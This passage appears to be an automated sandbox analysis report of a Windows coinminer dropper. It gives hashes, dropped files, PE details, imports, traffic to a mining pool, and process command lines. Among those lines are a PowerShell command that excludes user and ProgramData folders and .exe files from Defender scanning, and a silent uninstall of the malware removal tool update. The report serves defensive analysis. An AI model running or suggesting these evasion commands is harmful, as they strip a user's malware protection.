	https://oxy.st/d/SmUh	Get hash	malicious	Xmrig	Browse	95.179.241.203
	A3LDHn8wqA.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, zgRAT	Browse	198.13.56.225
	c5018a3915e8a9de41e083f7936c2d232b9a73ba41c8c07fb7b2d90d5f5d8e8e_dump.exe	Get hash	malicious	SystemBC	Browse	45.77.214.161
	has.exe	Get hash	malicious	Xmrig	Browse	45.76.89.70
	http://www.horizonservice.net	Get hash	malicious	Unknown	Browse	207.148.0.16
	file.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	139.180.171.140
	http://virtualhealth.com	Get hash	malicious	Unknown	Browse	207.148.0.16
	https://info.virtualhealth.com/e3t/Ctc/GB+113/cmmfD04/VWRD9T8N6WzjN8MJTHvTlRp-W842MfZ5g9NL_N6-TN-l3qgyTW7Y8-PT6lZ3mfW56Rjx787zhFxW4_YPND6r6flrW4BlJlg1DphdCVWC28Z4PpMbRW6GGMRN2bfpFdW7hSWPP6KFbcRW4PBy7c6n3dRqN7ztR5NtV-d9W1y6F6Z799h-lN1ZbvtmQ73TLW5ShFj48-W2NPW1L2f016vN6bSW45yp6K7Xp_V9W1fy0nl6xLNR_N5n9x3txmtWFN2nZ6w9QgWwJW1rlxcq4rmPQZW2D31f_3FjFXjN7D51x8lx574V_S2G96X3V3rW3xJHsh5zkBZjW6M_Gg24KcjVwW2wm07P9jh6znVyVtyJ6VBB3ZW80wlHc6H0YX2W1stJK56XtGc2f45z9Cx04	Get hash	malicious	Unknown	Browse	207.148.0.16

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Windows\Temp\gtebvdararzg.sys	https://oxy.st/d/SmUh	Get hash	malicious	Xmrig	Browse
	1SE2yI1hsN.exe	Get hash	malicious	Xmrig	Browse
	sky.exe	Get hash	malicious	Xmrig	Browse
	has.exe	Get hash	malicious	Xmrig	Browse
	c3p.exe	Get hash	malicious	Xmrig	Browse
	wk.exe	Get hash	malicious	Xmrig	Browse
	HaQQVRT0Xg.exe	Get hash	malicious	RedLine, Xmrig	Browse
	1hMmINqZK8.exe	Get hash	malicious	Xmrig	Browse
	SecuriteInfo.com.Trojan.InjectNET.14.20916.16428.exe	Get hash	malicious	Xmrig	Browse
	aFc8xaUnnc.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3779584
Entropy (8bit):	6.224997459984367
Encrypted:	false
SSDEEP:	49152:nGZDMulRiJu9AkhFPwLZrd4Gz2FP+Jmzu5EFNZf:nGr
MD5:	B99383ADE7723A2376AC12D1FF516AA6
SHA1:	5298425D67725856A9BD85104B5B585B306F2B53
SHA-256:	13A78B0CAC6CE349E4DBFEB770D7C77D598B0ED1C688E7CF915D2F931CD58BF7
SHA-512:	4BEB70A245114051AD3CD36400151629AD79F1735A7A0914FB5E519214511A67F5113C60B17F9700EE39DBF8904A6EA60EC0D86B695E986D8AE51426FD7F7A4C
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.G...G...G...N..K...0..E...0..D...0..N...0..P.......K...G......G...`...T7..F...RichG...........................PE..d....hf.........."....(......7................@..............................9...........`..................................................9...............9...............9.t....j9.T....................k9.(...`i9.@...............P............................text...J........................... ..`.rdata..r.7.......7.................@..@.data...P.....9.......9.............@....pdata........9.......9.............@..@.reloc..t.....9.......9.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1940658735648508
Encrypted:	false
SSDEEP:	3:NlllulJnp/p:NllU
MD5:	BC6DB77EB243BF62DC31267706650173
SHA1:	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
SHA-256:	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
SHA-512:	91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
Malicious:	false
Preview:	@...e.................................X..............@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmgre3nn.jyw.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r4oek4jq.iqf.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_twscbzmi.cu3.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ukrdmtf5.ewz.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Windows\Temp\__PSScriptPolicyTest_1ksoiwsx.q32.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_l35xcuuo.y1v.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_o2zndmgw.43f.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\__PSScriptPolicyTest_usg3rmda.ml4.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\Temp\gtebvdararzg.sys

Download File

Process:	C:\ProgramData\xtthvazemyzh\nlkuzmdacjrb.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: , Detection: malicious, Browse Filename: 1SE2yI1hsN.exe, Detection: malicious, Browse Filename: sky.exe, Detection: malicious, Browse Filename: has.exe, Detection: malicious, Browse Filename: c3p.exe, Detection: malicious, Browse Filename: wk.exe, Detection: malicious, Browse Filename: HaQQVRT0Xg.exe, Detection: malicious, Browse Filename: 1hMmINqZK8.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Trojan.InjectNET.14.20916.16428.exe, Detection: malicious, Browse Filename: aFc8xaUnnc.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (console) x86-64, for MS Windows
Entropy (8bit):	6.224997459984367
TrID:	Win64 Executable Console (202006/5) 81.26% UPX compressed Win32 Executable (30571/9) 12.30% Win64 Executable (generic) (12005/4) 4.83% Generic Win/DOS Executable (2004/3) 0.81% DOS Executable Generic (2002/1) 0.81%
File name:	file.exe
File size:	3'779'584 bytes
MD5:	b99383ade7723a2376ac12d1ff516aa6
SHA1:	5298425d67725856a9bd85104b5b585b306f2b53
SHA256:	13a78b0cac6ce349e4dbfeb770d7c77d598b0ed1c688e7cf915d2f931cd58bf7
SHA512:	4beb70a245114051ad3cd36400151629ad79f1735a7a0914fb5e519214511a67f5113c60b17f9700ee39dbf8904a6ea60ec0d86b695e986d8ae51426fd7f7a4c
SSDEEP:	49152:nGZDMulRiJu9AkhFPwLZrd4Gz2FP+Jmzu5EFNZf:nGr
TLSH:	DF062320BC556AFCC0A8C230527F5F652EA17D805719E4FB9B9076263E3EBE02D3A54C
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........m.G...G...G...N...K....0..E....0..D....0..N....0..P.......K...G.......G...`...T7..F...RichG...........................PE..d..

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x14001d2e0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows cui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x6668A5DD [Tue Jun 11 19:30:37 2024 UTC]
TLS Callbacks:	0x4000e300, 0x1
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	e615d926e29d797368c6f62e2a009561

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F571C6F1338h
dec eax
add esp, 28h
jmp 00007F571C6F0EC7h
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
int3
nop word ptr [eax+eax+00000000h]
dec eax
sub esp, 10h
dec esp
mov dword ptr [esp], edx
dec esp
mov dword ptr [esp+08h], ebx
dec ebp
xor ebx, ebx
dec esp
lea edx, dword ptr [esp+18h]
dec esp
sub edx, eax
dec ebp
cmovb edx, ebx
dec esp
mov ebx, dword ptr [00000010h]
dec ebp
cmp edx, ebx
jnc 00007F571C6F1068h
inc cx
and edx, 8D4DF000h
wait
add al, dh

Rich Headers

Programming Language:

[IMP] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3999ec	0xf0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x39c000	0x1380	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x39e000	0x474	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x396aa0	0x54	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x396b00	0x28	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x396960	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x20000	0x350	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x1e34a	0x1e400	08371eff3057e59c283fb773d2fbbbc9	False	0.5301200929752066	data	6.3970622105248385	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x20000	0x37a672	0x37a800	62301604f68c1271057578b2cbf2d67b	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x39b000	0x350	0x200	3b0f8a69f8cd6bbf76e1a42616eb572e	False	0.275390625	data	2.0204210344500524	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x39c000	0x1380	0x1400	ea6d4a35d6257f3bd6fbcfcd070f4292	False	0.5001953125	data	5.113193827962313	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x39e000	0x474	0x600	65e9a2bf662e8d466d04041bc2975864	False	0.5188802083333334	data	4.560610387522679	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
api-ms-win-core-synch-l1-2-0.dll	WakeByAddressAll, WakeByAddressSingle, WaitOnAddress
ntdll.dll	NtProtectVirtualMemory, NtCreateThreadEx, NtWaitForSingleObject, RtlCaptureContext, RtlVirtualUnwind, RtlLookupFunctionEntry, NtAllocateVirtualMemory, NtReadVirtualMemory, NtWriteVirtualMemory, RtlNtStatusToDosError, NtWriteFile
KERNEL32.dll	GetModuleHandleW, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, CreateMutexA, LoadLibraryA, WaitForSingleObjectEx, GetModuleHandleA, WriteConsoleW, MultiByteToWideChar, GetConsoleWindow, CreateProcessA, WriteProcessMemory, CreateFileW, CreateFileMappingW, CloseHandle, MapViewOfFile, UnmapViewOfFile, GetCurrentProcess, GetProcAddress, GetCurrentThread, GetLastError, AddVectoredExceptionHandler, SetThreadStackGuarantee, WaitForSingleObject, QueryPerformanceCounter, SetLastError, GetCurrentDirectoryW, GetEnvironmentVariableW, GetStdHandle, GetCurrentProcessId, HeapFree, HeapReAlloc, lstrlenW, ReleaseMutex, GetProcessHeap, HeapAlloc, GetConsoleMode, IsProcessorFeaturePresent, FormatMessageW, ExitProcess
PSAPI.DLL	EnumProcessModulesEx, GetModuleBaseNameW
USER32.dll	SetWindowPos, ShowWindow
VCRUNTIME140.dll	__CxxFrameHandler3, memset, memcmp, memmove, _CxxThrowException, __C_specific_handler, __current_exception, __current_exception_context, memcpy
api-ms-win-crt-math-l1-1-0.dll	__setusermatherr
api-ms-win-crt-runtime-l1-1-0.dll	_initialize_onexit_table, _seh_filter_exe, _crt_atexit, _configure_narrow_argv, _register_onexit_function, _get_initial_narrow_environment, _initterm, _initterm_e, exit, _exit, __p___argc, __p___argv, _cexit, _c_exit, _register_thread_local_exe_atexit_callback, _initialize_narrow_environment, _set_app_type, terminate
api-ms-win-crt-stdio-l1-1-0.dll	_set_fmode, __p__commode
api-ms-win-crt-locale-l1-1-0.dll	_configthreadlocale
api-ms-win-crt-heap-l1-1-0.dll	_set_new_mode, free

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/17/24-18:15:13.266118	UDP	2036289	ET TROJAN CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	62460	53	192.168.2.6	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 17, 2024 18:15:13.277220964 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:13.282968044 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:13.283034086 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:13.283153057 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:13.287940025 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:14.139409065 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:14.185647964 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:25.761567116 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:25.919991970 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:33.691075087 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:33.695832014 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:33.946506023 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:34.107574940 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:40.011950970 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:40.016987085 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:40.268527985 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:40.420027971 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:15:47.935048103 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:15:48.107511044 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:16:01.135525942 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:16:01.216944933 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:16:09.767215967 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:16:09.920041084 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:16:23.286271095 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:16:23.291141033 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:16:23.620217085 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:16:23.716950893 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:16:31.943063021 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:16:32.107580900 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:16:45.399159908 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:16:45.607582092 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:17:01.134510994 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:17:01.217129946 CEST	49717	3333	192.168.2.6	45.76.89.70
Jun 17, 2024 18:17:05.915821075 CEST	3333	49717	45.76.89.70	192.168.2.6
Jun 17, 2024 18:17:06.107595921 CEST	49717	3333	192.168.2.6	45.76.89.70

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 17, 2024 18:15:13.266118050 CEST	62460	53	192.168.2.6	1.1.1.1
Jun 17, 2024 18:15:13.274662018 CEST	53	62460	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 17, 2024 18:15:13.266118050 CEST	192.168.2.6	1.1.1.1	0x5c44	Standard query (0)	pool.hashvault.pro	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jun 17, 2024 18:15:00.043272018 CEST	1.1.1.1	192.168.2.6	0x1682	No error (0)	bg.microsoft.map.fastly.net	199.232.210.172	A (IP address)	IN (0x0001)	false
Jun 17, 2024 18:15:00.043272018 CEST	1.1.1.1	192.168.2.6	0x1682	No error (0)	bg.microsoft.map.fastly.net	199.232.214.172	A (IP address)	IN (0x0001)	false
Jun 17, 2024 18:15:13.274662018 CEST	1.1.1.1	192.168.2.6	0x5c44	No error (0)	pool.hashvault.pro	45.76.89.70	A (IP address)	IN (0x0001)	false
Jun 17, 2024 18:15:13.274662018 CEST	1.1.1.1	192.168.2.6	0x5c44	No error (0)	pool.hashvault.pro	95.179.241.203	A (IP address)	IN (0x0001)	false

Target ID:	0
Start time:	12:15:04
Start date:	17/06/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0x7ff728770000
File size:	3'779'584 bytes
MD5 hash:	B99383ADE7723A2376AC12D1FF516AA6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2226259589.000001BB80000000.00000020.00000001.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: 00000000.00000002.2226502800.000001BB802AB000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	12:15:04
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	12:15:04
Start date:	17/06/2024
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):
Commandline:	notepad.exe
Imagebase:
File size:	201'216 bytes
MD5 hash:	27F71B12CB585541885A31BE22F61C83
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:15:05
Start date:	17/06/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase:	0x7ff6e3d50000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	12:15:05
Start date:	17/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff66e660000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase:	0x7ff677ff0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:15:09
Start date:	17/06/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
